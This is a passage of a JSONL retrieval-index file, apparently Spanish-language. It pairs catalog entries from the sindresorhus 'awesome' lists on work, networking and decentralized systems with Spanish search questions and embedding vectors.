-0.02154, -0.01977, 0.03299, -0.02638, -0.05592, 0.02612, 0.01728]} +{"tipo": "pregunta", "herramienta": "Work", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Work", "tema": "work", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Work: Slack β€” Team collaboration. Communities. Remote Jobs. Productivity. Niche Job Boards. Programming Interviews. Code Review β€” Reviewing code. Creative Technology β€” Businesses & groups that specialize in combining computing, design, art, and user experience.", "indexar": "que herramienta sirve para colaborar en equipo y trabajar de forma remota", "v": [0.06764, 0.02471, -0.28266, -0.24731, 0.06572, -0.15577, -0.02762, 0.04905, -0.017, -0.12311, -0.11883, -0.09891, 0.11571, -0.04312, 0.11604, 0.09045, 0.11831, -0.04621, -0.05668, -0.00613, 0.08836, -0.01081, 0.00887, 0.00879, 0.00617, -0.08188, 0.06129, 0.00179, -0.13344, 0.07605, 0.05753, 0.03767, 0.05298, -0.08009, 0.02564, -0.02248, -0.03349, 0.02094, -0.00098, -0.00969, -0.06323, 0.01349, -0.12783, -0.01426, 0.03621, 0.09496, 0.01494, -0.07897, 5e-05, 0.16257, -0.07827, -0.11624, -0.01372, -0.15809, -0.09237, -0.06925, 0.21528, -0.1183, -0.05288, -0.09486, -0.0837, -0.02636, -0.10564, -0.06942, 0.04316, 0.01948, -0.06739, -0.09269, -0.0897, 0.04288, -0.08554, 0.05067, 0.01064, -0.1259, -0.08447, -0.01773, -0.03952, 0.05071, 0.01285, -0.06484, 0.10593, 0.07461, -0.01622, -0.00705, -0.02024, -0.10576, 0.10102, 0.05094, 0.00012, -0.11697, -0.02384, 0.07207, -0.04215, -0.02524, 0.01901, 0.07136, 0.03883, -0.04696, -0.00561, -0.00046, 0.10203, -0.07301, -0.03244, -0.00197, -0.05772, 0.0604, 0.01205, 0.02666, -0.07448, 0.00777, 0.08763, -0.03228, -0.01995, 0.04158, -0.02852, -0.02933, -0.06111, -0.02595, -0.00281, -0.03601, 0.05335, 0.00604, -0.03397, 0.00795, 0.04389, -0.08237, 0.02962, 0.04487, 0.04109, -0.02127, -0.07252, 0.02224, -0.06922, 0.07511, -0.02972, 0.00665, 0.0315, -0.08551, -0.03182, -0.08265, 0.04061, 0.03196, -0.00997, -0.12945, 0.02465, 0.0442, 0.06172, -0.04234, -0.03345, -0.06724, 0.03368, -0.05377, -0.02635, 0.0187, -0.11628, 0.00761, 0.00147, 0.05254, -0.09623, 0.02363, -0.00603, -0.06024, 0.02701, -0.00798, -0.033, -0.03292, 0.04612, -0.05682, 0.11417, 0.00911, -0.04798, -0.02202, 0.0948, -0.09031, -0.01688, -0.03247, -0.02804, -0.00838, -0.00524, -0.03099, -0.04037, 0.00673, -0.02635, -0.00305, 0.07133, 0.01134, 0.055, -0.01024, -0.04057, 0.00643, -0.01257, 0.01242, 0.02351, -0.03594, 0.01762, 0.00913, -0.02848, -0.0254, 0.035, -0.00459, -0.01053, -0.05274, 0.01291, 0.01182, 0.01508, 0.02193, -0.05139, 0.02379, -0.00246, 0.04246, 0.09023, -0.0513, -0.02483, 0.00841, -0.00768, -0.02565, 0.02295, -0.04813, -0.03227, 0.04914, 0.01328, -0.01002, 0.04738, -0.03658, 0.05209, 0.05591, 0.04429, 0.03674, -0.01336, -0.09229, 0.04392, -0.01493, -0.02453, -0.01426, -0.03891, -0.05579, 0.0224, 0.00165, -0.03577, -0.02381, -0.00124, 0.02843, -0.03377, -0.02256, -0.02528, -0.04765, -0.01511, 0.01458, -0.01615, -0.06256, -0.07614, 0.03389, 0.05469, -0.01381, 0.02374, 0.01378]} +{"tipo": "pregunta", "herramienta": "Work", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Work", "tema": "work", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Work: Slack β€” Team collaboration. Communities. Remote Jobs. Productivity. Niche Job Boards. Programming Interviews. Code Review β€” Reviewing code. Creative Technology β€” Businesses & groups that specialize in combining computing, design, art, and user experience.", "indexar": "con que puedo organizar comunidades profesionales o buscar trabajos especializados", "v": [0.09671, 0.1505, -0.12988, -0.20727, -0.05959, -0.14299, 0.14102, 0.0984, -0.19889, -0.14921, -0.08181, 0.01938, 0.03512, -0.0985, 0.08518, 0.01507, 0.12507, -0.01382, -0.00287, 0.09421, -0.05334, -0.02948, 0.00537, 0.1157, -0.01608, -0.21149, 0.06008, -0.10514, -0.07907, 0.05902, -0.01414, 0.12407, -0.04408, -0.03947, 0.02009, -0.00719, -0.08538, 0.01157, -0.1332, -0.07112, -0.08024, 0.02204, -0.14531, -0.03428, 0.04715, 0.0533, -0.13985, -0.06437, -0.0656, -0.00449, -0.09268, -0.00962, -0.01602, -0.11193, -0.02156, -0.10353, 0.03012, -0.0129, -0.03578, 0.00923, -0.07375, 0.07157, -0.01156, 0.02221, 0.19436, 0.03788, 0.06035, 0.05674, 0.03295, 0.02539, -0.07961, -0.00122, 0.02583, -0.04311, -0.01895, 0.03686, -0.03363, 0.07729, 0.02622, -0.00945, 0.03853, 0.05405, 0.03654, -3e-05, -0.07351, -0.09719, -0.12666, -0.04845, 0.07913, -0.09282, 0.0784, 0.00137, 0.00264, -0.00105, -0.0439, 0.03991, 0.09407, -0.00385, 0.03746, 0.08358, 0.02256, -0.07037, -0.05751, 0.07496, -0.00594, 0.02287, 0.08529, 0.08471, -0.00603, -0.00991, -0.01472, 0.01748, 0.08129, -0.01529, -0.05027, -0.06052, -0.04475, -0.038, 0.04712, 0.00147, 0.01697, -0.05684, 0.04739, 0.05409, 0.11128, -0.06476, 0.08838, 0.09434, -0.00039, 0.03396, -0.01073, 0.04675, -0.13578, -0.00499, -0.05958, 0.08736, 0.01986, -0.08167, -0.01971, -0.00647, -0.07123, -0.01631, -0.0648, -0.11202, 0.07031, 0.05892, 0.00367, -0.06586, 0.02579, -0.07091, 0.03653, 0.01269, 0.06518, -0.01371, -0.04361, -0.02222, -0.02983, -0.0048, 0.02159, 0.01632, 0.03735, 0.02693, -0.03309, -0.08291, 0.00176, 0.07187, 0.01347, 0.02564, 0.06729, 0.01891, -0.04569, -0.02541, 0.04134, -0.07308, 0.03719, 0.04008, -0.00101, -0.05521, 0.08762, 0.03303, -0.01462, 0.0201, -0.03689, -0.02162, 0.07624, 0.02324, 0.04002, 0.02116, -0.00746, 0.01581, 0.03022, -0.03043, 0.05255, -0.03184, -0.01271, -0.04702, -0.00327, -0.05935, -0.0951, -0.01656, 0.00794, -0.05181, -0.01749, 0.02778, -0.06617, -0.03405, -0.04069, 0.03369, -0.01048, 0.05624, 0.0329, -0.0647, 0.02295, -0.00768, -0.0204, -0.01512, 0.01774, -0.06576, 0.00237, 0.08543, -0.05833, 0.03006, 0.01829, -0.01848, 0.02884, -0.11557, 0.04517, -0.00179, -0.00718, 0.00509, 0.03721, 0.04548, -0.04434, -0.00087, 0.03663, 0.05518, 0.02404, -0.00935, 0.00262, 0.04159, 0.04566, 0.01047, 0.00232, 0.00584, -0.0696, -0.0147, -0.01662, 0.0423, 0.01527, -0.05389, -0.02775, 0.06705, 0.03037, 0.0011, 0.07015, -0.01628]} +{"tipo": "pregunta", "herramienta": "Networking", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Networking", "tema": "networking", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Networking: Software-Defined Networking. PCAPTools. Real-Time Communications β€” Network protocols for near simultaneous exchange of media and data. SNMP β€” A protocol for collecting, modifying, and organizing information about managed devices on IP networks. Scapy β€” Python-based interactive packet manipulation. Cilium β€” Provides networking and security capabilities for containerized apps, microservices, and virtual machines.", "indexar": "que herramienta sirve para manipular paquetes de red en tiempo real?", "v": [0.14676, 0.00846, -0.14117, -0.16229, 0.02602, -0.11451, -0.03041, 0.01192, 0.04622, -0.09939, -0.02952, -0.08934, 0.07833, -0.10908, 0.04847, 0.10044, -0.02962, -0.04215, 0.04889, -0.01258, 0.10417, -0.04163, -0.1608, -0.06597, 0.01352, 0.07339, 0.14561, -0.01531, -0.19399, 0.11612, -0.01656, 0.04361, -0.0239, -0.12669, -0.10519, -0.03447, 0.03171, 0.07099, -0.00669, 0.05646, 0.05099, 0.04214, -0.06887, 0.01975, 0.02167, 0.08258, 0.0165, -0.00958, -0.05239, 0.06663, -0.0376, -0.15681, -0.16119, -0.02983, -0.04141, -0.161, 0.19534, -0.13984, -0.03284, -0.08918, -0.04463, -0.02882, -0.0255, -0.03498, 0.08227, 0.00374, 0.01057, -0.09459, -0.04222, 0.03783, -0.05139, -0.00677, 0.07967, 0.01887, -0.04548, -0.05961, -0.00368, -0.02961, 0.0021, 0.01599, 0.02207, 0.02124, -0.07586, 0.05568, 0.00643, -0.10641, 0.10505, -0.10844, 0.03552, -0.11522, -0.01948, 0.06705, 0.0407, -0.00817, 0.11586, 0.02084, 0.02252, -0.12379, 0.03201, 0.01245, 0.16052, -0.01372, -0.13279, -0.03325, -0.00496, 0.06807, 0.00955, -0.00263, 0.02912, 0.00101, 0.0362, -0.00677, 0.0591, -0.0129, 0.03758, 0.06265, 0.07657, -0.04843, -0.04615, -0.06401, 0.00757, 0.02763, -0.10766, -0.0187, 0.04755, -0.03174, 0.01516, -0.0526, -0.04282, -0.0986, -0.0945, 0.00071, -0.05115, -0.01561, -0.0342, -0.13938, 0.01144, -0.12629, 0.02016, -0.04192, -0.00668, 0.084, -0.0988, -0.12326, -0.00827, 0.07635, 0.02003, 0.01473, -0.00656, -0.0129, 0.09308, -0.07518, 0.03269, 0.03621, 0.01316, -0.00544, -0.04043, 0.02155, -0.10466, 0.04405, -0.03457, -0.0299, 0.0066, -0.02698, -0.01624, -0.05063, 0.03162, 0.02426, 0.07787, 0.0414, 0.00501, 0.01398, 0.06049, 0.0356, -0.05415, -0.07073, -0.0456, -0.02257, -0.01694, -0.09519, 0.05798, 0.00223, 0.01225, -0.01083, 0.01057, -0.03591, -0.01983, -0.00058, 0.01027, 0.01857, 0.03106, -0.02636, 0.07395, -0.01593, 0.0104, 0.04199, 0.01514, -0.04565, 0.02914, 0.00049, 0.02254, -0.04619, 0.03297, 0.01156, -0.01125, 0.10501, -0.00109, 0.01665, 0.00538, 0.06703, 0.02478, 0.05303, 0.00535, -0.01301, -0.05125, -0.01584, 0.02879, -0.01221, -0.01297, 0.00099, 0.02424, -0.04827, -0.01079, -0.01018, -0.104, 0.01334, -0.01491, 0.08079, 0.00172, -0.011, 0.07208, -0.02815, 0.01466, 0.01982, -0.03601, -0.06756, 0.1178, 0.01943, -0.04181, -0.0467, -0.02423, 0.0203, -0.01807, -0.02891, -0.01704, -0.04233, -0.0519, -0.05803, -0.00287, -0.05524, -0.07278, 0.03776, 0.02003, -0.0494, 0.04779, -0.04844]} +{"tipo": "pregunta", "herramienta": "Networking", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Networking", "tema": "networking", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Networking: Software-Defined Networking. PCAPTools. Real-Time Communications β€” Network protocols for near simultaneous exchange of media and data. SNMP β€” A protocol for collecting, modifying, and organizing information about managed devices on IP networks. Scapy β€” Python-based interactive packet manipulation. Cilium β€” Provides networking and security capabilities for containerized apps, microservices, and virtual machines.", "indexar": "cual programa puedo usar para implementar redes definidas por software?", "v": [-0.05592, 0.09401, -0.15381, -0.13766, 0.07395, -0.10029, -0.02568, -0.12233, -0.18021, -0.10189, -0.05934, -0.13691, -0.04211, -0.16116, -0.01334, 0.05171, 0.03386, -0.13876, 0.11336, -0.03395, -0.0131, -0.01738, -0.10733, -0.10991, -0.08435, 0.06687, 0.02296, -0.03807, -0.05632, -0.07713, -0.0164, -0.06704, 0.10178, -0.13614, -0.13633, 0.00846, -0.00126, 0.05957, -0.01107, 0.06405, 0.07033, 0.01492, -0.05808, 0.014, 0.15293, 0.01906, 0.0369, -0.06512, -0.06141, -0.07172, 0.01858, 0.02584, -0.05329, -0.00745, 0.02121, -0.13824, 0.05349, -0.11071, -0.08213, 0.05746, -0.02048, 0.0132, 0.00052, -0.01347, 0.00439, -0.06255, 0.03813, 0.03154, -0.11608, 0.10591, 0.07725, 0.09624, 0.06336, -0.07719, 0.04459, 0.13523, -0.06525, -0.0337, 0.04247, -0.00423, -0.03149, 0.01878, -0.02897, 0.11354, -0.11061, -0.0668, 0.12337, -0.06823, 0.03028, -0.08215, -0.03967, 0.01039, -0.03288, 0.04379, 0.08714, -0.00379, 0.08171, 0.03252, 0.05208, 0.06224, -0.01901, -0.06279, -0.05981, 0.11699, -0.07733, -0.01256, 0.01104, -0.03846, -0.02616, -0.05984, 0.02398, 0.0518, -0.05622, -0.06245, -0.00928, 0.00244, -0.01537, -0.10398, 0.07893, -0.03424, -0.02215, 0.07038, -0.03409, -0.03088, 0.16438, 0.03803, -0.00854, 0.1629, -0.05707, 0.01531, 0.00737, -0.02387, -0.03269, -0.06978, -0.08186, -0.0415, 0.01907, -0.08004, 0.00026, -0.03255, -0.03431, 0.00802, -0.07194, -0.00789, 0.06441, 0.0457, 0.00694, -0.10427, -0.03313, 0.03777, 0.05052, 0.00832, -0.07742, 0.04339, -0.07159, 0.0436, 0.00263, -0.02696, -0.08653, 0.02811, -0.09501, -0.01501, -0.02937, -0.10794, 0.06285, -0.03161, -0.03225, 0.04738, 0.05502, 0.06508, -0.01224, 0.13343, 0.01941, -0.03827, -0.03432, -0.03108, -0.0457, -0.07789, -0.02898, -0.03982, -0.0729, 0.00389, 0.05142, -0.01016, 0.00991, -0.00633, -0.03887, 0.07801, -0.07091, 0.01458, -0.05636, 0.00458, 0.01138, -0.04234, 0.07361, -0.02904, -0.02813, 0.03719, 0.01608, -0.0557, -0.0709, -0.00737, -0.03139, -0.0057, 0.01439, 0.03573, -0.03695, -0.00112, 0.04267, 0.15998, -0.01866, -0.02401, 0.03466, 0.05341, -0.03317, -0.03082, 0.01656, 0.03368, 0.04683, 0.02293, -0.00802, -0.01332, 0.01442, 0.05304, -0.01265, -0.01446, -0.02354, 0.02085, -0.01817, -0.04352, -0.00993, -0.05971, -0.01883, -0.02734, -0.01216, -0.02502, 0.01787, -0.01963, -0.04282, -0.09044, -0.03797, 0.10118, 0.005, -0.01639, -0.04764, 0.00375, -0.06663, -0.00214, -0.00991, -0.02465, -0.04588, 0.04566, 0.04788, -0.03025, 0.03463, 0.02742]} +{"tipo": "pregunta", "herramienta": "Networking", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Networking", "tema": "networking", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Networking: Software-Defined Networking. PCAPTools. Real-Time Communications β€” Network protocols for near simultaneous exchange of media and data. SNMP β€” A protocol for collecting, modifying, and organizing information about managed devices on IP networks. Scapy β€” Python-based interactive packet manipulation. Cilium β€” Provides networking and security capabilities for containerized apps, microservices, and virtual machines.", "indexar": "hay alguna alternativa libre a Scapy para la manipulacion de paquetes?", "v": [0.13719, -0.02397, -0.1537, -0.02562, -0.21795, -0.16183, 0.0498, -0.09249, -0.12677, -0.01097, 0.01157, -0.03915, 0.04708, 0.01903, -0.00692, 0.0092, -0.05985, -0.01581, 0.09117, 0.04331, 0.00831, 0.03347, -0.1104, -0.07522, -0.01159, 0.01661, 0.05181, 0.01625, -0.12364, 0.04844, 0.03616, 0.07252, 0.00163, -0.01392, -0.02868, 0.02326, 0.1451, -0.08323, 0.24714, -0.05495, 0.10949, -0.14647, -0.12878, -0.0157, -0.01379, 0.04037, -0.03083, 0.12668, -0.06724, 0.0026, -0.04182, -0.12704, -0.05606, -0.04285, 0.02079, -0.04347, 0.14039, -0.07281, 0.00885, -0.0125, -0.0063, 0.0366, 0.04836, -0.07712, 0.10391, 0.07845, -0.06182, -0.13179, -0.02289, 0.15039, 0.01936, -0.06945, 0.13499, 0.00349, -0.07732, -0.0105, -0.06109, -0.02382, -0.04895, 0.10592, -0.00794, -0.05911, -0.00268, 0.06037, -0.03478, -0.0764, 0.0366, -0.12059, 0.02083, -0.01579, 0.06546, 0.00594, 0.01135, 0.10564, 0.03597, -0.06076, -0.05925, 0.03589, 0.0435, 0.15729, 0.12491, 0.02657, -0.1049, 0.02323, -0.02782, 0.05661, 0.00991, 0.03954, 0.047, 0.02392, -0.00389, 0.05828, 0.05861, -0.01202, -0.10745, -0.00411, 0.04055, 0.0532, 0.01854, -0.00346, -0.01031, -0.04728, -0.09536, -0.0046, 0.05912, -0.02424, 0.07833, 0.05878, -0.10614, 0.01905, -0.02865, -0.00054, -0.03536, -0.07142, -0.01427, -0.14616, 0.0617, -0.05667, 0.09359, 0.04808, 0.00411, 0.06485, -0.03571, -0.01369, 0.01006, -0.02567, 0.04358, -0.00287, 0.01531, -0.03431, 0.05366, -0.02254, 0.03939, 0.06562, 0.02961, 0.05535, -0.01524, -0.02692, -0.0445, 0.08514, -0.01343, -0.01839, 0.00033, 0.04552, -0.05124, 0.02678, -0.04886, -0.06649, -0.09325, 0.07076, -0.03966, 0.06138, 0.07292, 0.02391, 0.04124, -0.04458, -0.04257, -0.0607, 0.05701, -0.0441, 0.08812, 0.06098, -0.05089, -0.02938, -0.00116, -0.04854, -0.0333, 0.02474, 0.02033, 0.04512, 0.04341, 0.0104, -0.04838, -0.09683, -0.04666, 0.00855, 0.0474, -0.0258, 0.00665, 0.06596, 0.02592, -0.0399, 0.01281, -0.0248, -0.02382, 0.06577, -0.03973, -0.02592, 0.03039, 0.10133, 0.06468, 0.03601, 0.05773, -0.00785, -0.09365, 0.02041, 0.01604, -0.02601, 0.00882, 0.04988, 0.01233, -0.01591, -0.00478, -0.00385, -0.06283, 0.05998, -0.02221, 0.10644, 0.03844, 0.03713, 0.05995, -0.01676, 0.02579, 0.05286, -0.01669, -0.01344, 0.06502, 0.02204, -0.01966, -0.01358, -0.00217, 0.01939, -0.033, -0.04666, -0.03467, -0.03511, -0.07438, -0.01586, 0.00048, -0.01284, -0.01308, 0.03682, -0.03821, -0.02992, 0.05585, -0.02488]} +{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Bitcoin β€” Services and tools for Bitcoin software developers. Ripple β€” Open source distributed settlement network. Non-Financial Blockchain β€” Applications of Blockchain beyond finance. Mastodon β€” Open source decentralized microblogging network. Ethereum β€” Distributed computing platform for smart contract development. Blockchain AI β€” AI and machine-learning projects built on Blockchain. EOSIO β€” A decentralized operating system supporting industrial-scale apps. Corda β€” Open source Blockchain platform designed for business. Waves β€” Open source Blockchain platform and development toolset for Web 3.0 apps and decentralized solutions. Substrate β€” Framework for writing scalable, upgradeable blockchains in Rust. Golem β€” Open source peer-to-peer marketplace for computing resources. Stacks β€” A smart contract platform secured by Bitcoin. Algorand β€” An open-source, proof of stake Blockchain and smart contract computing platform. ZeroNet β€” A decentralized web-like network of peer-to-peer users.", "indexar": "que programas o herramientas sirven para crear o desarrollar aplicaciones de blockchain?", "v": [-0.00831, 0.03449, -0.08586, -0.24431, 0.03765, -0.17524, -0.05961, 0.0245, -0.04506, -0.09789, -0.12843, -0.07567, -0.10903, -0.06669, 0.06881, 0.07452, -0.08713, -0.20703, -0.02824, 0.04324, 0.00329, 0.05, -0.09381, 0.01133, -0.05709, -0.05675, -0.04542, -0.03635, -0.11535, 0.1572, 0.00035, -0.08483, 0.07756, -0.01966, -0.02719, -0.11668, -0.07971, -0.01414, -0.01434, 0.0715, -0.0751, -0.02925, -0.02173, 0.022, 0.00282, 0.01189, 0.09062, 0.05467, -0.0242, -0.06838, -0.12592, -0.10118, -0.1174, 0.10684, 0.06858, -0.06258, 0.07367, -0.13004, 0.04028, 0.0567, -0.16663, 0.07805, 0.0253, -0.0371, -0.02318, -0.02751, -0.01509, 0.12444, -0.12496, 0.12756, 0.03887, 0.03343, -0.02782, 0.03986, 0.01103, 0.02194, -0.09493, -0.05898, -0.02474, -0.01678, -0.0785, -0.02944, -0.01206, 0.09052, -0.02463, -0.01469, 0.10015, 0.0513, -0.0046, -0.00944, -0.01259, 0.06767, 0.0002, -0.03556, 0.08091, 0.01617, 0.11709, -0.0087, 0.05376, 0.08147, -0.06422, -0.10875, -0.04119, 0.03205, -0.09145, 0.03871, 0.10182, -0.05741, 0.02692, -0.06352, 0.00174, 0.00632, -0.00365, 0.04879, -0.07583, -0.02587, -0.02896, -0.05661, 0.05237, -0.05455, -0.05017, -0.00796, -0.09611, 0.01909, 0.05151, 0.02815, -0.07511, 0.09384, 0.03206, -0.002, -0.01088, -0.03033, -0.1496, 0.02676, -0.04079, 0.02955, 0.08138, -0.00275, 0.05174, -0.00974, 0.04395, 0.05254, -0.02064, -0.03644, 0.07576, -0.01618, 0.02194, -0.03911, 0.00884, -0.00415, 0.05558, -0.0429, -0.06994, 0.05373, -0.17618, -0.07014, -0.04111, -0.08049, -0.07704, 0.03537, -0.02065, 0.00194, -0.04553, -0.03017, -0.07834, -0.0352, 0.07114, 0.10356, 0.05149, 0.12614, -0.01223, 0.09471, 0.04196, -0.09216, 0.0173, -0.07486, 0.02916, -0.00516, 0.01748, -0.08973, -0.08629, -0.02993, 0.0024, -0.00012, 0.02766, -0.09105, 0.03713, 0.02156, -0.00388, 0.09085, -0.04677, 0.02976, -0.00223, 0.0231, 0.00718, 0.00014, 0.0031, -0.02575, -0.02852, -0.01232, 0.00459, 0.02316, -0.02381, -0.02563, -0.01864, 0.07665, -0.0571, 0.0066, -0.03495, 0.03075, 0.03569, -0.02849, 0.07831, 0.04225, -0.0055, -0.07634, -0.01058, 0.05041, 0.03495, 0.00086, -0.04077, -0.0152, -0.00532, -0.00011, 0.01375, 0.01638, 0.04579, 0.00719, 0.01871, -0.00968, 0.03546, -0.00587, -0.02044, -0.01417, 0.0145, 0.02281, 0.01979, -0.01793, -0.04766, -0.03657, -0.06062, 0.06217, 0.00082, -0.0161, -0.03676, -0.00598, -0.02607, -0.00601, -0.07381, -0.04499, -0.0234, 0.01511, 0.12403, -0.00384, -0.01315, 0.00608]} +{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Bitcoin β€” Services and tools for Bitcoin software developers. Ripple β€” Open source distributed settlement network. Non-Financial Blockchain β€” Applications of Blockchain beyond finance. Mastodon β€” Open source decentralized microblogging network. Ethereum β€” Distributed computing platform for smart contract development. Blockchain AI β€” AI and machine-learning projects built on Blockchain. EOSIO β€” A decentralized operating system supporting industrial-scale apps. Corda β€” Open source Blockchain platform designed for business. Waves β€” Open source Blockchain platform and development toolset for Web 3.0 apps and decentralized solutions. Substrate β€” Framework for writing scalable, upgradeable blockchains in Rust. Golem β€” Open source peer-to-peer marketplace for computing resources. Stacks β€” A smart contract platform secured by Bitcoin. Algorand β€” An open-source, proof of stake Blockchain and smart contract computing platform. ZeroNet β€” A decentralized web-like network of peer-to-peer users.", "indexar": "con quΓ© puedo montar una red descentralizada para el intercambio de recursos informΓ‘ticos?", "v": [0.03051, 0.09758, -0.1584, -0.11671, 0.04548, -0.14415, -0.04069, 0.0335, -0.17091, -0.04636, 0.01552, -0.08394, 0.07777, -0.05133, 0.11276, 0.0867, 0.00782, 0.05449, 0.05367, -0.09292, 0.04977, -0.09152, 0.01628, 0.00527, 0.01513, 0.06827, -0.1768, -0.08525, -0.03956, 0.03333, 0.0538, -0.03058, 0.04421, 0.02916, -0.05731, -0.12603, 0.11764, 0.1082, 0.01743, -0.10604, 0.02141, 0.00587, -0.08875, -0.06642, 0.13393, -0.01487, -0.06818, -0.11165, 0.04227, -0.061, -0.07497, -0.16494, -0.11671, -0.13384, -0.05728, -0.09426, 0.06451, -0.01641, 0.02387, -0.04263, 0.00655, 0.23405, -0.03645, 0.03901, 0.05814, 0.04114, -0.10163, 0.00044, -0.17204, 0.06901, 0.0446, 0.05138, -0.04029, -0.07359, -0.05476, 0.09925, -0.00054, -0.03542, 0.0447, -0.05661, -0.02585, 0.08725, 0.05487, 0.08821, -0.00962, -0.08893, 0.08964, -0.08959, 0.03043, -0.04621, -0.02495, 0.02059, -0.02854, -0.07613, 0.08381, -0.03354, 0.01125, 0.04959, -0.03247, 0.0985, -0.07006, -0.00079, -0.06923, 0.09755, 0.01666, 0.03569, 0.10763, -0.00176, 0.11232, -0.00711, 0.04685, 0.0806, 0.03162, 0.03292, -0.07031, -0.01993, 0.04501, 0.0379, -0.02076, 0.00552, -0.07675, 0.03732, -0.03527, 0.03456, 0.05389, 0.01493, 0.05424, 0.0449, 0.01792, 0.05405, -0.03649, -0.06377, -0.04336, -0.07518, -0.01529, -0.01957, 0.00796, -0.10493, 0.00422, 0.00404, -0.00854, -0.00362, -0.07795, -0.05259, 0.01916, 0.09855, 0.13767, -0.08718, -0.04963, -0.01418, -0.0275, 0.04063, -0.00088, 0.02751, -0.09904, 0.09179, 0.0577, 0.03868, -0.05328, 0.01155, -0.11971, 0.03214, -0.00487, -0.00507, -0.04572, -0.00549, -0.02071, 0.0134, 0.04485, 0.01939, -0.04589, 0.05853, -0.01888, 0.00247, -0.01809, -0.05337, -0.05529, -0.03461, 0.00163, -0.0868, -0.00457, 0.03431, -0.06805, 0.03544, -0.01761, -0.01492, -0.03327, 0.0158, 0.01191, -0.00071, -0.05359, -0.04614, -0.00038, 0.0657, 0.06767, -0.02706, -0.04706, 0.01389, 0.04113, -0.05009, -0.05193, 0.02159, -0.00815, -0.02249, -0.00496, 0.04648, -0.08395, 0.00235, -0.0361, 0.05971, 0.02069, -0.04023, 0.09766, -0.0486, -0.09842, -0.05031, 0.01206, -0.00338, -0.03319, -0.02245, 0.09016, 0.03228, 0.01814, 0.03992, 0.03024, 0.00993, 0.0225, -0.00667, 0.02983, 0.05086, -0.07548, -0.00329, 0.00503, -0.02354, 0.02077, 0.03928, -0.00715, 0.04041, -0.03943, -0.01482, -0.02635, 0.06971, -0.05106, -0.10462, 0.00519, -0.02087, -0.11542, -0.01951, -0.01689, -0.04667, -0.03069, -0.02861, -0.00251, -0.02027, -0.02885, -0.00318]} +{"tipo": "pregunta", "herramienta": "Decentralized Systems", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Decentralized Systems", "tema": "decentralized systems", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Decentralized Systems: Bitcoin β€” Services and tools for Bitcoin software developers. Ripple β€” Open source distributed settlement network. Non-Financial Blockchain β€” Applications of Blockchain beyond finance. Mastodon β€” Open source decentralized microblogging network. Ethereum β€” Distributed computing platform for smart contract development. Blockchain AI β€” AI and machine-learning projects built on Blockchain. EOSIO β€” A decentralized operating system supporting industrial-scale apps. Corda β€” Open source Blockchain platform designed for business. Waves β€” Open source Blockchain platform and development toolset for Web 3.0 apps and decentralized solutions. Substrate β€” Framework for writing scalable, upgradeable blockchains in Rust. Golem β€” Open source peer-to-peer marketplace for computing resources. Stacks β€” A smart contract platform secured by Bitcoin. Algorand β€” An open-source, proof of stake Blockchain and smart contract computing platform. ZeroNet β€” A decentralized web-like network of peer-to-peer users.", "indexar": "cual es una alternativa libre a las plataformas comerciales para contratos inteligentes?", "v": [0.07806, 0.01068, -0.07442, -0.1423, -0.04886, -0.12567, 0.03221, -0.01797, -0.26236, -0.10067, -0.05876, -0.16505, -0.00567, 0.03752, 0.00894, 0.04099, 0.0745, -0.15415, 0.12108, -0.07599, -0.01346, -0.05161, -0.12022, -0.10214, -0.03883, -0.12936, -0.04459, 0.02453, -0.13627, 0.1033, -0.0267, -0.0792, 0.0423, -0.0497, -0.0066, -0.02985, 0.06074, 0.14823, 0.14059, -0.10909, 0.07594, -0.08894, -0.00215, -0.06316, 0.11473, 0.03365, -0.09743, -0.08645, -0.00648, 0.06908, -0.09313, -0.03886, -0.13556, 0.02267, 0.08852, 0.02382, 0.09247, 0.05096, -0.06935, -0.08035, -0.05306, 0.01049, 0.05011, 0.03539, 0.08235, 0.04557, 0.00117, 0.11676, -0.01966, 0.06129, 0.10333, -0.04307, -0.02251, -0.02185, -0.02233, 0.16761, -0.05365, -0.05248, 0.02107, 0.05155, 0.06367, -0.0643, -0.09783, 0.08786, 0.09461, -0.09154, 0.00373, -0.07959, -0.07102, -0.00433, 0.04051, -0.00885, -0.02767, 0.04671, 0.06227, -0.05378, 0.00922, 0.0062, -0.02362, 0.10709, -0.02391, 0.06735, -0.09591, -0.01643, -0.11957, 0.06716, -0.06176, -0.0185, -0.04071, -0.04127, -0.03695, 0.04564, 0.0389, 0.046, 0.01984, 0.03598, -0.00213, 0.01751, 0.0149, 0.05566, 0.00283, -0.01779, -0.02083, 0.02028, 0.07599, 0.02533, 0.03175, 0.07296, -0.02313, 0.00589, 0.04277, -0.07241, -0.06008, -0.11789, 0.00028, -0.01164, 0.1266, 0.01469, -0.00681, 0.02172, -0.02098, -0.01885, -0.04846, -0.00502, 0.05319, -0.03653, -0.04572, -0.02685, 0.07104, 0.04361, -0.04028, 0.05785, -0.08256, 0.14392, -0.0228, -0.0516, -0.03095, -0.00607, -0.11057, 0.07394, 0.05765, -0.02112, -0.01072, 0.02233, 0.0462, -0.01277, -0.05333, 0.04608, -0.04824, 0.077, 0.019, 0.05071, 0.08839, -0.08472, 0.04666, -0.04139, 0.00326, 0.01192, 0.02402, -0.06573, -0.00126, 